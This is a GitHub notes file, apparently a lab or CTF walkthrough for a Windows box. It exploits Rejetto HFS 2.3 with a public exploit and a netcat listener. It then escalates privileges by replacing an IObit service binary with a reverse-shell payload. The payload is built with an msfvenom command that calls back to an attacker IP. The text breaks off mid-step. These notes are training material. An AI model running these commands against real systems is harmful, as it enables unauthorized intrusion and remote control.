-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathnotes
More file actions
32 lines (28 loc) · 1.19 KB
/
notes
File metadata and controls
32 lines (28 loc) · 1.19 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
[+]
Recon - NMAP
{{
Two ports running web server - 80,8080
8080 - httpd 2.3 >> Rejetto HTTP File Server (HFS)
Found 4 exploits from searchsploit [searchsploit Rejetto 2.3]
}}
[+]
Initial Access
{{
EDB ID:39161
[python exploit.py <Target IP> <Port>] #before running this command finish 1 & 2
1.Run web server to host the nc.exe file
2.use netcat to lisen on the port (Dont forgot to edit the exploit with Local Ip and port)
}}
[+]
Privilege Escalation
{{
1.Run winPEAS > Found C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe] >> Vulnerable Program >> Try DLL Hijacking
2.Run PowerUp.ps1
Follow 1 or 2
PowerUp.ps1 >> https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc
winPEAS >> https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite
**Create payload using msfvenom**
[msfvenom -p windows/shell/reverse_tcp LHOST=10.10.132.66 LPORT=1234 -f exe -o ASCService.exe] >> Listen on port 1234
Upload File to the server >> C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
#stop the service before running the above command >> cmd:[sc stop AdvancedSystemCareService9]
#To upload file to the server run the below command the respective path